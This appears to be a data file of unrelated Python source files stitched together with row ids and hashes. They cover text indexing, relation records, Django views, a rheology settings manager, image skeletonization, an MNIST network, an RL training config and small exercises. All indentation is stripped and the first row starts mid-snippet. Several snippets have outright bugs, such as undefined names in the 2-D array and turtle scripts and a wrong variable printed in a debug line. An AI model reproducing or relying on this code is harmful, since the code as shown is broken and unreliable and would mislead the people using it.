Subproblem: To choose where 'a' start
'''
if DP_memo.get(S):
return DP_memo[S]
if is_alphabet(S):
DP_memo[S] = 0
else:
if is_alphabetical_order(S):
DP_memo[S] = 26 - len(S)
else:
DP_memo[S] = min( DP( ) )
|
993,555 | 2f66d6c6696934b7dafbe0a691c0c1cf6c07f025 | import nltk
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
import string
import json
lemmatizer = WordNetLemmatizer()
class InvertedIndex:
documents = []
index = {}
process_content = ""
custom_separator = "1111111111111111111111111"
def __init__(self, array_content):
self.docIds = array_content[:,0]
self.content = array_content[:,1] # [[textKey, content]]
print("self.docIds len", len(self.docIds))
print("self.content", len(self.content))
self.preprocessing_content()
self.create_documents()
def preprocessing_content(self):
self.add_separator()
self.remove_blank_spaces()
self.remove_special_chars()
self.remove_stop_words()
self.lemmatizer_all()
def add_separator(self):
# self.content = self.content.replace("* * * * *", custom_separator)
self.process_content = self.custom_separator.join(self.content)
self.process_content = self.process_content.replace("\n", " ")
print("separator added")
def remove_blank_spaces(self):
self.process_content = re.sub(" +", " ", self.process_content)
print("remove blank spaces")
def remove_special_chars(self):
# return re.sub('[^A-ZÜÖÄa-z0-9\s ]+', '', content)
self.process_content = re.sub(r"[-()\"#/@;:<>{}`+=~|.!?,\*\n]", "", self.process_content)
print("remove special chars")
def remove_stop_words(self):
stop_words = stopwords.words('english')
tokens_without_sw = [w.lower() for w in self.process_content.split(
" ") if w.lower() not in stop_words]
self.process_content = " ".join(tokens_without_sw)
print("remove stop words")
def lemmatizer_all(self):
lemmas_list = [lemmatizer.lemmatize(w)
for w in self.process_content.split(" ")]
self.process_content = " ".join(lemmas_list)
print("finish lemmatizer")
def create_documents(self):
self.documents = self.process_content.split(self.custom_separator)
print("self.documents len", len(self.documents))
def mapper(self, document):
current_map = {}
array_doc = document.split(" ")
for item in array_doc:
if(item!=""):
if item in current_map:
current_map[item] += 1
else:
current_map[item] = 1
return current_map
def reducer(self, mapper, docId):
for item in mapper:
if item not in self.index:
self.index[item] = []
self.index[item].append({"docId": docId, "value": mapper[item]})
def process(self):
print("init process")
count = 0
for document in self.documents:
if( len(self.docIds)> count ):
current_map = self.mapper(document)
self.reducer(current_map, self.docIds[count])
count += 1
print("finish proccess")
def saveIndexInDisc(self):
with open('../output/index.json', 'w') as outfile:
json.dump(self.index, outfile)
|
993,556 | c5e87c581d030c8aaa904ae4ed5c11b99863fca5 | from collections import namedtuple
from intervaltree import Interval
from rdflib import URIRef
EntityMention = namedtuple('EntityMention', ['start_char', 'end_char', 'uri'])
class RelRecord:
def __init__(self, relation, s0: int, s1: int, o0: int, o1: int,
ctext, cstart=0, cend=None, source_id=None):
self.relation = relation
self.s0 = self.s_start = s0
self.s1 = self.s_end = s1
self.o0 = self.o_start = o0
self.o1 = self.o_end = o1
self.context = ctext
self.cstart = cstart
self.cend = cend if cend is not None else cstart + len(ctext)
self.source_id = source_id if source_id is not None else hash(ctext)
def cut_context(self, begin, end):
self.context = self.context[begin:end]
self.cend = self.cstart + end
self.cstart = self.cstart + begin
self.s0 = self.s_start = max(self.cstart, self.s0)
self.s1 = self.s_end = min(self.s1, self.cend)
self.o0 = self.o_start = max(self.cstart, self.o0)
self.o1 = self.o_end = min(self.o1, self.cend)
assert self.valid_offsets
@property
def direction(self):
"""
Is direction of relation the same as order of (s, o) in the context.
:return: None, True or False
"""
return None if not bool(self.relation) else (self.s_end <= self.o_start)
@property
def valid_offsets(self):
return ((self.cstart <= self.s_start < self.s_end <= self.cend) and
(self.cstart <= self.o_start < self.o_end <= self.cend) and
disjoint(self.s_span, self.o_span))
@property
def s_startr(self): return self.s_start - self.cstart # offsets in dataset are relative to the whole document, not to the sentence
@property
def s_endr(self): return self.s_end - self.cstart
@property
def o_startr(self): return self.o_start - self.cstart
@property
def o_endr(self): return self.o_end - self.cstart
@property
def s_span(self): return (self.s_start, self.s_end)
@property
def o_span(self): return (self.o_start, self.o_end)
@property
def s_spanr(self): return (self.s_startr, self.s_endr)
@property
def o_spanr(self): return (self.o_startr, self.o_endr)
@property
def subject_text(self): return self.context[self.s_startr: self.s_endr]
@property
def object_text(self): return self.context[self.o_startr: self.o_endr]
@property
def subject(self): return self.subject_text
@property
def object(self): return self.object_text
@property
def triple(self): return (self.subject, self.relation, self.object)
def __hash__(self): return hash(self.id)
def __eq__(self, other): return self.id == other.id
@property
def id(self):
return (self.source_id, (self.cstart, self.cend),
self.s_span, self.o_span, self.triple)
def __str__(self):
return '\n'.join((' '.join('<{}>'.format(x) for x in self.triple), self.context.strip()))
class RelationRecord(RelRecord):
def __init__(self, s: URIRef, r: URIRef, o: URIRef,
s0: int, s1: int, o0: int, o1: int,
ctext, cstart=0, cend=None, source_id=None):
self.subject_uri = s
self.relation = r
self.object_uri = o
super().__init__(r, s0, s1, o0, o1, ctext, cstart, cend, source_id)
@property
def subject(self): return self.subject_uri
@property
def object(self): return self.object_uri
class EntityRecord:
def __init__(self, crecord, start, end, uri):
"""
:param uri: original uri
:param start: char offset of the start in crecord.context (including start)
:param end: char offset of the end in crecord.context (not including end)
:param crecord: source of entity: ContextRecord
"""
self.crecord = crecord
self.start = start
self.end = end
self.uri = uri
@property
def start_char(self): return self.start
@property
def end_char(self): return self.end
@property
def text(self):
return self.crecord.context[self.start: self.end]
@property
def span(self):
return self.start, self.end
@property
def spang(self):
s = self.crecord.start
return s+self.start, s+self.end
def cut_context(self, begin, end):
self.start = max(0, self.start - begin)
self.end = min(self.end, end)
def json(self):
return self.span, self.uri
def __str__(self):
return '[{}:{}] {}'.format(self.start, self.end, self.text.strip())
class ContextRecord:
@classmethod
def from_span(cls, span, artid, ents=None):
return cls(span.text, span.start_char, span.end_char, artid, ents)
def __init__(self, ctext, cstart, cend, artid, ents=None):
self.context = ctext
self.start = cstart
self.end = cend
self.article_id = artid
self.ents = [] if ents is None else ents
def cut_context(self, begin, end):
self.context = self.context[begin:end]
self.end = self.start + end
self.start = self.start + begin
for e in self.ents:
e.cut_context(begin, end)
@property
def start_char(self): return self.start
@property
def end_char(self): return self.end
@property
def span(self):
return self.start, self.end
def json(self):
return (self.article_id, self.span, self.context, [e.json for e in self.ents])
def __str__(self):
return self.context.strip() + '(' + '; '.join(str(e) for e in self.ents) + ')'
def disjoint(span1, span2):
return not Interval(*span1).overlaps(*span2)
|
993,557 | 76492508248f5e3e9e63df1d6892da62d1b405d0 | from django.views.generic import CreateView
from contact.forms import EmailForm
class HomeView(CreateView):
template_name = 'vitali/index.html'
form_class = EmailForm
success_url = '/contact/thanks/'
|
993,558 | 2b329aa4cc5611cdab25356a6fdecc91af0bcd99 | import os
# todo: remove debugging feature. Just use the built in debugging tools.
class Settings:
def __init__(self, debug=False):
self.valid_settings = ['DEBUG', 'INLINE_GRAPHS', 'LIN_SORTING_METHOD',
'NL_FITTING_METHOD', 'NL_SORTING_METHOD',
'PLOT_GRAPHS', 'SAVE_GRAPHS', 'AUTO_LIN', 'AUTO_NL', 'DO_LIN',
'DO_NL', 'TREAT_ALL', 'EXT', 'PREV_EXTRACTED', 'WAIT', 'FIXED_FP_NL',
'MAX_FP_NL']
self.valid_options_lin_sorting = ['by_error', 'by_error_length', 'by_R2']
self.valid_options_nl_sorting = ['eta_0', 'overall', 'R2']
self.models = ['Carreau', 'Cross', 'Carreau-Yasuda']
if debug:
self.DEBUG = True
else:
self.DEBUG = False
try:
self.load_settings()
except FileNotFoundError:
print('Settings file not found. Loading defaults.')
self.DEBUG = False
self.INLINE_GRAPHS = False
self.LIN_SORTING_METHOD = 'by_error_length' # by_error, by_error_length, by_R2
self.NL_FITTING_METHOD = 'Carreau' # Carreau, Cross, Carreau-Yasuda
self.NL_SORTING_METHOD = 'overall' # eta_0, overall, R2
self.PLOT_GRAPHS = False
self.SAVE_GRAPHS = False
self.AUTO_LIN = True
self.AUTO_NL = True
self.DO_LIN = True
self.DO_NL = True
self.TREAT_ALL = False
self.EXT = 'txt'
self.PREV_EXTRACTED = False
self.WAIT = '0.5'
self.FIXED_FP_NL = True
self.MAX_FP_NL = 2
print('Creating a new settings file with the defaults')
self.save_settings()
def save_settings(self):
with open('settings.dat', 'w') as settings_file:
settings_file.write('#This is an automatically created settings file.\n')
settings_file.write('\n# Inline graphs is meant for those with IDEs like Jupyter Notebooks\n')
settings_file.write('INLINE_GRAPHS=' + str(self.INLINE_GRAPHS))
settings_file.write(
'\n# Plot graphs after fitting, with error propagation? Slows down the process greatly.\n')
settings_file.write('PLOT_GRAPHS=' + str(self.PLOT_GRAPHS))
settings_file.write('\n# Save graphs after fitting? Useless if PLOT_GRAPHS is set to False\n')
settings_file.write('SAVE_GRAPHS=' + str(self.SAVE_GRAPHS))
settings_file.write('\n# When plotting, time it waits until the next plot is shown,'
' in seconds\n')
settings_file.write('WAIT=' + str(self.WAIT))
settings_file.write('\n# Treat all files in folder?\n')
settings_file.write('TREAT_ALL=' + str(self.TREAT_ALL))
settings_file.write('\n# Extension of files to look for\n')
settings_file.write('EXT=' + str(self.EXT))
settings_file.write('\n# If the important data has been extracted\n')
settings_file.write('PREV_EXTRACTED=' + str(self.PREV_EXTRACTED))
settings_file.write('\n\n#### Linear Fitting ####')
settings_file.write('\n# Perform linear fit?\n')
settings_file.write('DO_LIN=' + str(self.DO_LIN))
settings_file.write(
"\n# Sorting method of the automatic linear method.\n# Can be 'by_error', minimizing the " +
"error, 'by_error_length', which minimizes the error divided by the total number of " +
"points used, 'by_R2', which minimizes R squared.\n")
settings_file.write('LIN_SORTING_METHOD=' + str(self.LIN_SORTING_METHOD))
settings_file.write('\n# Set to True if you want the linear fitting to be done automatically. ' +
'False, if to be done manually.\n')
settings_file.write('AUTO_LIN=' + str(self.AUTO_LIN))
settings_file.write('\n\n#### Non-Linear Fitting ####')
settings_file.write('\n# Perform non-linear fitting?\n')
settings_file.write('DO_NL=' + str(self.DO_NL))
settings_file.write("\n# Fitting method. 'Carreau', 'Cross', 'Carreau-Yasuda'\n")
settings_file.write('NL_FITTING_METHOD=' + str(self.NL_FITTING_METHOD))
settings_file.write("\n# Can be 'overall', minimizing the error of all parameters, 'eta_0', " +
"minimizing the error of only this parameter, or 'R2'.\n")
settings_file.write('NL_SORTING_METHOD=' + str(self.NL_SORTING_METHOD))
settings_file.write('\n# Set to True if you want the non linear fitting to be done automatically\n')
settings_file.write('AUTO_NL=' + str(self.AUTO_NL))
settings_file.write('\n# Set to true if the first point should be fixed during fitting\n')
settings_file.write('FIXED_FP_NL=' + str(self.FIXED_FP_NL))
settings_file.write('\n# If FIXED_FP_NL is true, how much can it travel? This must be in terms of the'
'inverse of the length, that is, length/MAX_FP_NL. 1 would be the entire curve (not'
'recommended. 2 would be up to half the curve, etc.\n')
settings_file.write('MAX_FP_NL=' + str(self.MAX_FP_NL))
settings_file.write('\n\n##### Debug #####\n')
settings_file.write('# Show debug messages\n')
settings_file.write('DEBUG=' + str(self.DEBUG))
def load_settings(self):
fhand = open('settings.dat', 'r')
for line in fhand:
if line.startswith('#'):
continue
if len(line) < 4:
continue
line = line.rstrip()
line = line.replace(' ', '')
param, value = line.split('=')
if self.DEBUG:
print(line)
print(f'Var = {param} val= {param}')
# todo: think about using getattr
if (not hasattr(self, param)) and (param in self.valid_settings): # If param wasn't loaded and is valid
if value.lower() == 'true': # Assigns booleans first
setattr(self, param, True)
elif value.lower() == 'false':
setattr(self, param, False)
else:
setattr(self, param, value) # todo: check if the parameter is valid, i.e. Carreau
elif param not in self.valid_settings:
print(f"Settings file has an unrecognized parameter {param} which wasn't loaded.")
continue
fhand.close()
def print_settings(self):
counter = 0
valid_numbers = []
number_setting_corr = {} # To assign a number to a parameter. Ex: 1: 'EXT'
for param in self.valid_settings:
sett = getattr(self, param)
print(f"{counter}) {param} = {sett}", end='')
if type(sett) == bool:
print(': Options= True | False')
elif param == 'LIN_SORTING_METHOD':
print(': Options= ', end='')
print(*self.valid_options_lin_sorting, sep=' | ')
elif param == 'NL_FITTING_METHOD':
print(': Options= ', end='')
print(*self.models, sep=' | ')
elif param == 'NL_SORTING_METHOD':
print(': Options= ', end='')
print(*self.valid_options_nl_sorting, sep=' | ')
elif param == 'EXT':
print(': Options = txt | dat | csv | etc...')
elif param == 'WAIT':
print(': Options = time in seconds')
elif param == 'MAX_FP_NL':
print(': Options = 1/n. n=1: whole curve. n=2: half')
else:
print('\n')
valid_numbers.append(str(counter))
number_setting_corr[str(counter)] = param
counter += 1
print('\n===================\n')
if self.DEBUG:
print('Valid numbers', valid_numbers)
print('Correlation', number_setting_corr)
return valid_numbers, number_setting_corr
def edit_settings(self):
"""Edits the current settings"""
while True:
os.system('cls' if os.name == 'nt' else 'clear')
valid_numbers, number_setting_corr = self.print_settings()
print('Which setting you want to change? Enter "number, new value" to modify, or "done" to exit.')
print('Observe the possible values for each setting! They are case sensitive. '
'Inputting wrong values might break the program. \n')
choice = input('Input:')
if choice == 'done':
break
if ',' not in choice:
print('Invalid input. Place the number, followed by a comma, followed by its value. Eg: 1,TRUE')
continue
if len(choice.split(',')) != 2:
print('Invalid input, must have only one comma')
continue
var, val = choice.split(',')
if var not in valid_numbers:
print('Invalid number.')
continue
real_var = number_setting_corr[var] # Changes from a number to the actual parameter
if val.lower() == 'true':
setattr(self, real_var, True)
continue
elif val.lower() == 'false':
setattr(self, real_var, False)
continue
else:
setattr(self, real_var, val)
# todo: check for all possible values to avoid inputting wrong settings and messing everything up.
# if val not in valid_options_nl_sorting:
# print('Invalid nonlinear sorting option. Case sensitive! Be very precise.')
# continue
# if val not in valid_options_lin_sorting:
# print('Invalid linear sorting option. Case sensitive! Be very precise.')
# continue
# if val not in models:
# print('Invalid nonlinear fitting model. Case sensitive! Be very precise.')
# continue
print('===Final settings===')
_, _ = self.print_settings()
self.save_settings()
return
#
# settings = {
# 'DEBUG': False,
# 'INLINE_GRAPHS': False,
# 'SORTING_METHOD_LIN': 'by_error_length', # by_error, by_error_length
# 'NL_FITTING_METHOD': 'Carreau', # Carreau, Cross, Carreau-Yasuda
# 'SORTING_METHOD_NL': 'overall', # eta_0, overall
# 'PLOT_GRAPHS': False,
# 'SAVE_GRAPHS': False,
# 'AUTO_LIN': True,
# 'AUTO_NL': True,
# 'DO_LIN': True,
# 'DO_NL': True,
# 'TREAT_ALL': False,
# 'EXT': 'txt',
# 'PREV_EXTRACTED': False
# }
#
# valid_options_lin_sorting = ['by_error', 'by_error_length']
# valid_options_nl_sorting = ['eta_0', 'overall']
# models = ['Carreau', 'Cross', 'Carreau-Yasuda'] |
993,559 | cd27a3ffbdb8538b7f2f7bed70ff913b5b7d14e4 | import cv2 as cv
import numpy as np
def skeletonize(image):
goal_point = [300, 500]
img = image
wh_pixels_up = []
wh_pixels_left = []
wh_pixels_right = []
thresh_erode = img.copy()
skel = np.zeros(img.shape, np.uint8)
element = cv.getStructuringElement(cv.MORPH_CROSS, (3, 3))
while True:
open = cv.morphologyEx(img, cv.MORPH_OPEN, element)
temp = cv.subtract(img, open)
eroded = cv.erode(img, element)
skel = cv.bitwise_or(skel, temp)
img = eroded.copy()
if cv.countNonZero(img) == 0:
break
thresh_erode = cv.erode(thresh_erode, np.ones((7, 7), dtype=np.uint8), iterations=20)
out = cv.bitwise_and(skel, thresh_erode)
for row in range(300, 601):
if out[row][350] != 0:
wh_pixels_left.append((row, 350))
for row in range(300, 601):
if out[row][650] != 0:
wh_pixels_right.append((row, 650))
for col in range(350, 651):
if out[300][col] != 0:
wh_pixels_up.append((300, col))
# find goal point
if len(wh_pixels_up) > 0 and len(wh_pixels_left) == 0 and len(wh_pixels_right) == 0:
goal_point = wh_pixels_up[0]
if len(wh_pixels_right) > 0:
goal_point = wh_pixels_right[0]
if len(wh_pixels_left) > 0:
goal_point = wh_pixels_left[0]
wh_pixels_left.clear()
wh_pixels_right.clear()
wh_pixels_up.clear()
return goal_point
|
993,560 | f31b44640ee418566c9de77451293063ffb08abf | """
Program 7
Write a program which takes 2 digits (X and Y) as input and generate a 2-dimensional array
The element value in the i-th row and j-th column of the array should be i*j.
The program should print the 2-dimensional array as output with X number of rows and Y number of columns
"""
#console input
input_str = input("Enter any 2 numbers:")
#seperating input numbers by comma to generate a list
split_string = input_str.split(',')
print(split_string)
#converting the list of string format to int format
dimensions=[int(x) for x in split_string]
print(dimensions)
#assigning number of rows and columns
rowNum=dimensions[0]
colNum=dimensions[1]
#generating 2-D array
for row in range(rowNum):
for col in range(colNum):
multilist[row][col]= row*col
#printing 2-D array
print (multilist) |
993,561 | e6480f7e21b7f592a20f32d0c371af81f3e674c1 | from utils import Utils
from vector import Vector
'''
Class responsible for point with 3 coordinates
'''
class Point3D:
'''
Init of Point3D class
@param x coordinate x of point
@param y coordinate y of point
@param z coordinate z of point
'''
def __init__(self, x, y, z):
self.point = (x, y, z)
'''
Method that create a vector with 2 points
@param self actual object
@param point another object of Point3D
@returns a vector
'''
def createVector(self, oPoint):
if(isinstance(oPoint, Point3D)):
return Vector(Utils.subtract3DTuples(self.point, oPoint.point))
raise TypeError("The argument have to be of type Point3D")
|
993,562 | 7e2632615656ceeef203a266f7c0e9c4ca4521cf | import torch
from torchvision import transforms # 数据预处理
from torchvision import datasets # 数据集获取
from torch.utils.data import DataLoader
# 针对MNIST图像数据集的预处理,不用深究
transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307, ), (0.3081, ))])
# 分别读取训练集、测试集
train_dataset = datasets.MNIST(root='../dataset/mnist/', train=True, download=True, transform=transform)
train_loader = DataLoader(dataset=train_dataset, shuffle=True, batch_size=64)
test_dataset = datasets.MNIST(root='../dataset/mnist/', train=False, download=True, transform=transform)
test_loader = DataLoader(dataset=test_dataset, shuffle=False, batch_size=64) # 测试集无需打乱顺序
class Model(torch.nn.Module):
def __init__(self):
super(Model, self).__init__()
self.convolution1 = torch.nn.Conv2d(in_channels=1, out_channels=10, kernel_size=5)
self.convolution2 = torch.nn.Conv2d(in_channels=10, out_channels=20, kernel_size=5)
self.maxpooling = torch.nn.MaxPool2d(kernel_size=2)
self.linear1 = torch.nn.Linear(in_features=320, out_features=160) # 这里要知道320怎么来的
self.linear2 = torch.nn.Linear(in_features=160, out_features=80)
self.linear3 = torch.nn.Linear(in_features=80, out_features=40)
self.linear4 = torch.nn.Linear(in_features=40, out_features=10)
self.activate = torch.nn.Tanh()
def forward(self,x):
x = self.activate(self.maxpooling(self.convolution1(x)))
x = self.activate(self.maxpooling(self.convolution2(x)))
x = x.view(-1, 320)
x = self.activate(self.linear1(x))
x = self.activate(self.linear2(x))
x = self.activate(self.linear3(x))
x = self.linear4(x)
return x
model = Model()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") #
model.to(device) #
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=0.05, momentum=0.5)
def train(epoch):
running_loss = 0.0
for batch_idx, data in enumerate(train_loader, 1):
inputs, lables = data
inputs, lables = inputs.to(device), lables.to(device) #
outputs = model(inputs)
loss = criterion(outputs, lables)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
if batch_idx % 300 == 299: # 每300次迭代(即训练300个batch),输出一次Loss
print('[%d,%5d] loss: %3f' % (epoch+1, batch_idx+1, running_loss))
running_loss = 0.0
def test():
correct = 0
total = 0
with torch.no_grad(): # 在测试过程中无需计算梯度
for data in test_loader:
inputs, lables = data
inputs, lables = inputs.to(device), lables.to(device) #
outputs = model(inputs)
_, predicted = torch.max(outputs.data, dim=1) # dim=1表示取每行的最大值,dim=0表示取每列的最大值,_是最大值,predicted是最大值的下标
total += lables.size(0)
correct += (predicted == lables).sum().item() # 张量之间的比较运算
print('Accuracy on test set: %5f %%' % (100 * correct / total))
if __name__ == '__main__':
for epoch in range(100):
train(epoch)
test() |
993,563 | 042b18cb58b839d2de5a205ad8af980b96bc2726 | import turtle
wn=turtle.Screen()
owen=turtle.Turtle()
pendown()
def make_squares(turt,size,num):
for i in range(4):
turt.forward(size)
turt.left(90)
turt.left(90)
turt.penup()
turt.forward(2*size)
make_square(owen,20) |
993,564 | f1a88fc8809befa62284dd955baa35fe60bb4ce5 | '''
A script for searching through various possibilities with uncertainty model online learning, assuming
that we are modeling the uncertainty of the action model.
'''
import sys
sys.path.append('curiosity')
sys.path.append('tfutils')
import tensorflow as tf
from curiosity.interaction import train, environment, data, cfg_generation
import curiosity.interaction.models as models
from tfutils import base, optimizer
import numpy as np
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-g', '--gpu', default = '0', type = str)
parser.add_argument('-ea', '--encarchitecture', default = 0, type = int)
parser.add_argument('-fca', '--fcarchitecture', default = 0, type = int)
parser.add_argument('-mbaa', '--mbaarchitecture', default = 0, type = int)
parser.add_argument('--umlr', default = 1e-3, type = float)
parser.add_argument('--actlr', default = 1e-3, type = float)
parser.add_argument('--loss', default = 0, type = int)
parser.add_argument('--tiedencoding', default = False, type = bool)
parser.add_argument('--heat', default = 1., type = float)
parser.add_argument('--egoonly', default = False, type = bool)
parser.add_argument('--zeroedforce', default = False, type = bool)
parser.add_argument('--optimizer', default = 'adam', type = str)
parser.add_argument('--batching', default = 'uniform', type = str)
parser.add_argument('--batchsize', default = 32, type = int)
parser.add_argument('--numperbatch', default = 8, type = int)
parser.add_argument('--historylen', default = 1000, type = int)
parser.add_argument('--ratio', default = 2 / .17, type = float)
parser.add_argument('--objsize', default = .4, type = float)
N_ACTION_SAMPLES = 1000
EXP_ID_PREFIX = 'chpp'
NUM_BATCHES_PER_EPOCH = 1e8
IMAGE_SCALE = (128, 170)
ACTION_DIM = 5
args = vars(parser.parse_args())
wm_arch_params = {
'encode_deets' : {'sizes' : [3, 3, 3, 3], 'strides' : [2, 2, 2, 2], 'nf' : [32, 32, 32, 32]},
'action_deets' : {'nf' : [256]},
'future_deets' : {'nf' : [512]}
}
wm_cfg= cfg_generation.generate_latent_marioish_world_model_cfg(image_shape = IMAGE_SCALE, act_loss_type = 'one_l2', include_previous_action = False, action_dim = ACTION_DIM, **wm_arch_params)
um_encoding_choices = [
{
'sizes' : [7, 3, 3, 3],
'strides' : [3, 2, 2, 2],
'num_filters' : [32, 32, 32, 32],
'bypass' : [0, 0, 0, 0]
}
]
um_mlp_choices = [
{
'num_features' : [50, 50, 1],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{
'num_features' : [10, 10, 1],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None]
},
{},
{
'num_features' : [10, 10, 10, 1],
'nonlinearities' : [['crelu', 'square_crelu'], ['crelu', 'square_crelu'], ['crelu', 'square_crelu'], 'identity'],
'dropout' : [None, None, None, None]
},
]
mlp_before_action_choices = [
{
'num_features' : [500, 1],
'nonlinearities' : ['relu', 'relu']
},
{
'num_features' : [500, 1],
'nonlinearities' : ['relu', 'tanh']
}
]
um_loss_choices = [
models.l2_loss,
]
um_encoding_args = um_encoding_choices[args['encarchitecture']]
um_mlp_before_act_args = mlp_before_action_choices[args['mbaarchitecture']]
um_mlp_args = um_mlp_choices[args['fcarchitecture']]
um_cfg = {
'use_world_encoding' : args['tiedencoding'],
'encode' : cfg_generation.generate_conv_architecture_cfg(desc = 'encode', **um_encoding_args),
'mlp_before_action' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_before_act_args),
'mlp' : cfg_generation.generate_mlp_architecture_cfg(**um_mlp_args),
'heat' : args['heat'],
'wm_loss' : {
'func' : models.get_mixed_loss,
'kwargs' : {
'weighting' : {'action' : 1.0, 'future' : 0.0}
}
},
'loss_func' : um_loss_choices[args['loss']],
'loss_factor' : 1. / float(args['batchsize']),
'only_model_ego' : args['egoonly'],
'n_action_samples' : N_ACTION_SAMPLES
}
model_cfg = {
'world_model' : wm_cfg,
'uncertainty_model' : um_cfg,
'seed' : 0
}
lr_params = {
'world_model' : {
'act_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
},
'fut_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['actlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
},
'uncertainty_model' : {
'func': tf.train.exponential_decay,
'learning_rate': args['umlr'],
'decay_rate': 1.,
'decay_steps': NUM_BATCHES_PER_EPOCH, # exponential decay each epoch
'staircase': True
}
}
if args['optimizer'] == 'adam':
optimizer_class = tf.train.AdamOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
}
}
elif args['optimizer'] == 'momentum':
optimizer_class = tf.train.MomentumOptimizer
optimizer_params = {
'world_model' : {
'act_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
},
'fut_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
},
'uncertainty_model' : {
'func': optimizer.ClipOptimizer,
'optimizer_class': optimizer_class,
'clip': True,
'momentum' : .9
}
}
train_params = {
'updater_func' : train.get_latent_updater,
'updater_kwargs' : {
'state_desc' : 'depths1'
}
}
model_params = {
'func' : train.get_latent_models,
'cfg' : model_cfg,
'action_model_desc' : 'uncertainty_model'
}
one_obj_scene_info = [
{
'type' : 'SHAPENET',
'scale' : args['objsize'],
'mass' : 1.,
'scale_var' : .01,
'num_items' : 1,
}
]
which_batching = args['batching']
if which_batching == 'uniform':
dp_config = cfg_generation.generate_experience_replay_data_provider(batch_size = args['batchsize'], image_scale = IMAGE_SCALE, scene_info = one_obj_scene_info, history_len = args['historylen'], do_torque = False)
elif which_batching == 'objthere':
dp_config = cfg_generation.generate_object_there_experience_replay_provider(batch_size = args['batchsize'], image_scale = IMAGE_SCALE, scene_info = one_obj_scene_info, history_len = args['historylen'], do_torque = False, ratio = args['ratio'], num_gathered_per_batch = args['numperbatch'])
else:
raise Exception('Invalid batching argument')
load_and_save_params = cfg_generation.query_gen_latent_save_params(location = 'freud', prefix = EXP_ID_PREFIX, state_desc = 'depths1')
postprocessor_params = {
'func' : train.get_experience_replay_postprocessor
}
params = {
'model_params' : model_params,
'data_params' : dp_config,
'postprocessor_params' : postprocessor_params,
'optimizer_params' : optimizer_params,
'learning_rate_params' : lr_params,
'train_params' : train_params
}
params.update(load_and_save_params)
params['allow_growth'] = True
if __name__ == '__main__':
os.environ['CUDA_VISIBLE_DEVICES'] = args['gpu']
train.train_from_params(**params)
|
993,565 | 4e9fd5cde2e8b050e8a723f9a32e0b8ff0089042 | """
Create console program for proving Goldbach's conjecture.
Program accepts number for input and print result.
For pressing 'q' program successfully close.
Use function from Task 5.5 for validating input,
handle all exceptions and print user friendly output.
"""
from Session_7.Task_7_5 import check_number
def get_set_prime_numbers(number):
"""
function get number and return set of all
prime number up to this one.
"""
prime_numbers = set()
for i in range(2, number + 1):
for j in prime_numbers:
if i % j == 0:
break
else:
prime_numbers.add(i)
return prime_numbers
def check_goldbachs_conjecture(number, prime_numbers):
"""find sum of prime numbers to get number"""
for num in prime_numbers:
if number - num in prime_numbers:
return f"{number} = {num} + {number - num}"
def main():
while True:
number = input("input a number to check Goldbach's conjecture (press 'q' to exit): ")
if number.lower() == "q":
break
elif check_number(number):
number = int(number)
prime_numbers = get_set_prime_numbers(number)
result = check_goldbachs_conjecture(number, prime_numbers)
print(result)
print("The program is completed")
if __name__ == '__main__':
main()
|
993,566 | 34960b3047b9bf5f267b92ee3d82a3d8dc3d3753 | # No one writes a perffect programme
# The act of finding and removing bugs from code is called recommendation
# How to debug properly
# 1. use linting -> linting allows us to fing errors before running our code
# 2. use an ide or editor
# 3. learn to read errors
# 4. pdb -> python debugger -> favourite debugger (pdb.set_trace() -> stops here)
# pdb gives an ineractive debugger -> you can type 'help' list to see all the commands
# step allows us to step thru the code
import pdb
def add_numbers(n1, n2):
pdb.set_trace() # -> helps you to step thru your code
return n1 + n2
result = add_numbers(10, 'hello')
print(result)
|
993,567 | 44d9775a5c94c59ba1ee4b062bd8b13f61c764a7 | from django.contrib import admin
from .models import Category,Doctor
# Register your models here
class CategoryAdmin(admin.ModelAdmin):
list_display = ['name', 'slug']
prepopulated_fields = {'slug': ('name',)}
admin.site.register(Category, CategoryAdmin)
class DoctorAdmin(admin.ModelAdmin):
list_display = ['name', 'slug', 'img','charge','category']
prepopulated_fields = {'slug': ('name',)}
admin.site.register(Doctor,DoctorAdmin)
|
993,568 | 383c1cd76bdaa60b98fc5e9aef6cc002cbb36c32 | {
'extra_keys': (),
'file_ext': '.fits',
'filetype': 'dark',
'ld_tpn': 'acs_drk_ld.tpn',
'parkey': ('DETECTOR', 'CCDAMP', 'CCDGAIN'),
'parkey_relevance': {'ccdgain': '(DETECTOR != "SBC")', 'ccdamp': '(DETECTOR != "SBC")'},
'reffile_format': 'image',
'reffile_required': 'yes',
'reffile_switch': 'darkcorr',
'rmap_relevance': '(DARKCORR != "OMIT")',
'suffix': 'drk',
'text_descr': 'Dark Frame',
'tpn': 'acs_drk.tpn',
'unique_rowkeys': None,
}
|
993,569 | 025ee8681c6996f0bbf402cc17daba06d511ad2f | /Users/pmlee/anaconda3/lib/python3.6/shutil.py |
993,570 | 845e58d763118ae39f7d8bf37522c0655278f0c4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
